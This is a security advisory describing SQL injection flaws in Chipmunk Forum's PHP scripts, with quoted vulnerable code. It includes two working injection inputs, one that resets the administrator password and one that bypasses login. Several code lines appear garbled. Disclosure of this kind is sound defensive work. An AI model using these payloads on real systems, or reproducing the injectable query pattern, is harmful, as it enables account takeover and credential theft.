|
Brought to you by:
Suppliers of:
|
|
|
| |
Chipmunk Forum is "a small yet flexible and fully featured forum system".
Due to inadequate filtering by Chipmunk Forum's PHP scripts a remote attacker can cause the program to insert arbitrary SQL statements into existing ones, allowing him to gain elevated privileges to the forum, change information of users, obtain passwords, etc. |
| |
Credit:
The information has been provided by GHC vision.
|
| |
Vulnerable script getpassword.php
Vulnerable code:
if(isset($_POST['submit']))
{
$email=$_POST['email'];
$getinfo="SELECT * from b_users where email='$email'";
...
mail("$email","Your Forum password","Your forum password has been set to $value");
Exploit:
Use the following as the email: ghc@ghc.ru' or username='Administrator this will change password the password oft the Administrator account (The "Administrator" must be a valid user name).
Vulnerable script authenticate.php
Vulnerable code:
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from b_users where username='$username' and password='$password' and validated='1'";
Exploit:
At the login.php page enter as the username Administrator'/*
Vulnerable script edit.php
Vulnerable code:
if(isset($_POST['ID']))
{
$ID=$_POST['ID'];
}
else
{
$ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author and b_posts.ID='$ID'";
It is possible to inject SQL statements through the $ID variable.
Vulnerable script search.php
Vulnerable code:
$searchterm=$_POST['searchterm'];
$getthreads="SELECT * from b_posts where post like '%$searchterm%' and threadparent='0' order by telapsed DESC limit $start, 50";
It is possible to inject SQL statements through $searchterm parameter.
Vulnerable script newtopic.php
Vulnerable code:
$name=$_POST['name'];
$title=$_POST['title'];
$post=$_POST['post'];
$day=date("D M d, Y H:i:s");
$timegone=date("U") ;
if($_POST['nosmiley'])
...
$name=strip_tags($name);
$title=strip_tags($title);
$post=strip_tags($post);
$posting="INSERT INTO b_posts (author, title, post,timepost, telapsed, postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post', '$day', '$timegone','$forumID','$user','$nosmiley','$s')";
mysql_query($posting) or die("could not post");
It is possible to inject SQL statements through $name, $title, and $post parameters.
Vulnerable script reguser.php
Vulnerable code:
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT*from b_users where username='$username' or email='$email'";
...
if ($password==$pass2 && $_POST['password'])
{
$password=md5($password);
$supervalue=$value;
$daycte("U");
$email=$_POST['email'];
$location=$_POST['location'];
$aim=$_POST['aim'];
$showprofile=$_POST['showprofile'];
$icq=$_POST['icq'];
$seedval=$day#0000;
srand($seedval);
$key=RAND(1000000,2000000);
if($requirekey=="no"||$requirekey=="No") //if you do no require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, email, location, AIM, ICQ, showprofile, validated) values ('$username', '$password', '$signature', '$email', '$location', '$aim', '$icq', '$showprofile', '1')";
mysql_query($SQL) or die(mysql_error());
}
else //you require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, keynode, email, location, AIM, ICQ, showprofile) values ('$username', '$password', '$signature', '$key', '$email', '$location', '$aim', '$icq', '$showprofile')";
mysql_query($SQL) or die(mysql_error());
mail("$email","Your forum activation key","Paste the URL to activate your account.
$boardpath/activate.php?username=$username&password=$password&keynode=$key");
}
It is possible to inject SQL statements through the registration form's variables.
|
|
|
|
|
